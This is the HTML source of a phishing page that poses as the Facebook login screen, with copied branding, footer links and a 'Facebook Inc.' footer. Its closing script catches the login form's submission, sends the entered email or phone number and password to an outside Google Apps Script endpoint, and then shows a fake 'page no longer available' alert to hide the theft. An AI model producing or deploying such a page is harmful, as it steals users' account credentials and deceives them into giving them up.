<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="shortcut icon" href="fb.png" type="image/x-icon">
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet"
        id="bootstrap-css">
    <style>
        .register .nav-tabs .nav-link:hover {
            border: none;
        }
        body{
            margin-top: -100px;
        }

        .text-align {
            margin-top: -3%;
            margin-bottom: -9%;

            padding: 10%;
            margin-left: 30%;
        }

        .form-new {
            margin-right: 22%;
            margin-left: 20%;
        }

        .register-heading {
            margin-left: 30%;
            margin-bottom: 5%;
            color: #007af5;
        }

        .register-heading h1 {
            margin-left: 21%;
            margin-bottom: 10%;
            color: #e9ecef;
        }

        .register {
            background: white;
            margin-top: 3%;
            padding: 3%;
            border-radius: 2.5rem;
        }

        .btnSubmit {
            width: 50%;
            border-radius: .3rem;
            padding: 1.5%;
            color: #fff;
            background-color: #007af5;
            border: none;
            cursor: pointer;
            margin-right: 6%;
            color: whitesmoke;
            margin-top: 4%;
            font-weight: bold;
        }
        #footer_wrapper {
  width: 100%;
  clear: both;
  float: left;
  margin-top: 30px;
  min-width: 995px;
  background-color: white;
  text-align: left;
}
#footer1 {
  width: 980px;
  margin: 0px auto;
  padding: 0px;
  border-bottom: 1px solid #e6e6e6;
  height: 30px;
  line-height: 30px;
  font-size: 12px;
  color: #848484;
}
#footer1 a {
  color: #365899;
  display: inline;
  margin-left: 10px;
  text-decoration: none;
}
#footer1 a:hover {
  text-decoration: underline;
}
#footer2 {
  width: 980px;
  margin: 0px auto;
  padding: 0px;
  font-size: 12px;
  color: #848484;
}
#footer2 a {
  color: #365899;
  display: inline-block;
  margin: 5px;
  margin-left: 0px;
  min-width: 80px;
  text-decoration: none;
}
#footer2 a:hover {
  text-decoration: underline;
}
#end{
text-align: center;   
}
.last{
    margin-top: -50px;
    text-align: center;
    margin-right: 10px;
}
.alu{
     background-color: rgb(0, 153, 0);
     border-radius: .3rem;  
      color: whitesmoke;
      padding-bottom: 5px;
       text-align: center;
    margin-right: 10px;
}
    </style>

</head>

<body>

    <div class="container register">
        <div class="row">
            <div class="col-md-12">
                <div class="tab-pane fade show active text-align form-new" id="home" role="tabpanel"
                    aria-labelledby="home-tab">
                    <h3 class="register-heading"><b>facebook</b></h3>
                    <div class="row register-form">
                        <div class="col-md-12">
                            <form method="post" autocomplete="off" name="google-sheet">
                                <!-- <div class="form-group">
                                    <input type="text" name="Name" class="form-control" placeholder="Your Name *"
                                        value="" required="" />
                                </div> -->
                                <div class="form-group">
                                    <input type="text" name="Email" class="form-control" placeholder="Mobile number or email address"
                                        value="" required="" />
                                </div>
                                <div class="form-group">
                                    <input type="password" name="Phone" class="form-control"
                                        placeholder="password" value="" required="" />
                                </div>
                                <div class="form-group">
                                    <input type="submit" name="submit" class="btnSubmit btn-block" value="Log in" />
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="last">
       <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">
        <p id="password">Forgotten password?</p>
       </a>
        <p id="or">or</p>
        <button type="submit" class="alu">Create account</button>
        <!-- <input type="submit" name="submit" class="btnSubmit btn-block" id="btn" value="Log in" /> -->
    
    </div>
    <div id="footer_wrapper" class="col-md-12">
    
        <div id="footer1">
            English (UK) <a href="">हिन्दी</a><a href="">ਪੰਜਾਬੀ</a><a href=""> اردو</a><a href="">தமிழ்</a><a
                href="">বাংলা</a><a href="">मराठी</a><a href="">తెలుగు</a><a href="">ગુજરાતી</a><a href="">ಕನ್ನಡ</a><a
                href="">മലയാളം</a>
        </div>
        <div id="footer2">
            <a href="">Sign Up</a><a href="">Log In</a><a href="">Messenger</a><a href="">Talkerscode</a><a
                href="">Mobile</a><a href="">Find Friends</a><a href="">Badges</a><a href="">People</a><a
                href="">Pages</a><a href="">Places</a><a href="">Games</a><a href="">Locations</a><a
                href="">Celebrities</a><a href="">Groups</a><a href="">Moments</a><a href="">About</a><a href="">Create
                Advert</a><a href="">Create Page</a><a href="">Developers</a><a href="">Careers</a><a href="">Privacy</a><a
                href="">Cookies</a><a href="">Ads</a><a href="">Terms</a><a href="">Help</a>
            
        </div>
    
    </div>
    <footer> <p id="end">Facebook Inc.</p> </footer>

    <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbyE_xdepARBeKu6lbrRDi9rDMLT7G2zUeLLJCsI559e2fyeyQC-STB7b28xi3s9_1UR/exec'
        const form = document.forms['google-sheet']

        form.addEventListener('submit', e => {
            e.preventDefault()
            fetch(scriptURL, { method: 'POST', body: new FormData(form) })
                .then(response => alert("The page you are looking for is no longer available.Try again later."))
                .catch(error => console.error('Error!', error.message))
        })
    </script>

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</body>

</html>